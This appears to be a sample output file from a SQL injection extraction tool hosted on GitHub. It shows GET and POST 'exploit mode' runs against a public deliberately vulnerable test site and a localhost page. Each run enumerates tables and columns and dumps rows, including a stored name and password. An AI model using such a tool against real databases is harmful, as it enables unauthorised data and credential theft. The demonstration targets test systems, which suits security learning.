-
Notifications
You must be signed in to change notification settings - Fork 0
/
SampleToolOutput.txt
81 lines (57 loc) · 2.82 KB
/
SampleToolOutput.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
*********************************************************** GET BASED OUTPUT ***********************************************************
Enter exploit mode [1. for GET (Query String Based) 2. for POST (Form based) - (Default: 1): 1
Enter vulnerable URL (Ensure ID are provided): http://testphp.vulnweb.com/listproducts.php?cat=2
**** DB Version: 5.x.x ******
-------------------------DATA EXTRACTION INITIATED-------------------------
(Provide Schema (Database) details from which data need to be extracted.)
[1] User Input Schema Name
[2] Current Schema
[3] DB-Catalog Schema
Select an option: 1
Enter Schema Name: acuart
*** Schema (Database) selected for extraction: acuart
Trying to extract common tables from MySql
Common tables extracted: []
Enter no of Tables you want to extract - (Default: 10): 2
Thanks. Wait Now..!
Table Names: a r t i s t s , c a r t s ,
Enter no of Columns you want to extract - (Default: 4096): 2
Thanks. Wait Now..!
ColumnNames for Table [artists]: a r t i s t _ i d , a n a m e ,
ColumnNames for Table [carts]: c a r t _ i d , p r i c e ,
Table :artists, Column: artist_id, Data: 1
Table :artists, Column: artist_id, Data: 2
Table :artists, Column: artist_id, Data: 3
Table :artists, Column: aname, Data: r4w8173
Table :artists, Column: aname, Data: Blad3
Table :artists, Column: aname, Data: lyzae
*********************************************************** POST BASED OUTPUT **********************************************************
Enter exploit mode [1. for GET (Query String Based) 2. for POST (Form based) - (Default: 1): 2
Enter Vulnerable URL: http://localhost/test1.php
Enter number of form variables present: 2
Enter form Variable Name [1]: name
Enter form Variable Value [1]: ANY-VALUE-AS-THIS-IS-VULNERABLE-FORM-VARIABLE
Enter form Variable Name [2]: submitaccess
Enter form Variable Value [2]: true
Entered form variables are : [1]name , [2]submitaccess ,
Please provide the vulnerable form Variable Name: 1
**** DB Version: 10.x.x ******
-------------------------DATA EXTRACTION INITIATED-------------------------
(Provide Schema (Database) details from which data need to be extracted.)
[1] User Input Schema Name
[2] Current Schema
[3] DB-Catalog Schema
Select an option: 2
*** Schema (Database) selected for extraction: [test]
Trying to extract data from some common MySql tables !!!
Common tables extracted: []
Enter no of Tables you want to extract - (Default: 10)
2
Thanks. Wait Now..!
Tables extracted: f i l e s , ,
Enter no of Columns you want to extract - (Default: 4096): 3
Thanks. Wait Now..!
ColumnNames for Table [files]: n a m e , p a s s w o r d , c o n t e n t ,
Table :files, Column: name, Data: varun
Table :files, Column: password, Data: india
Table :files, Column: content, Data: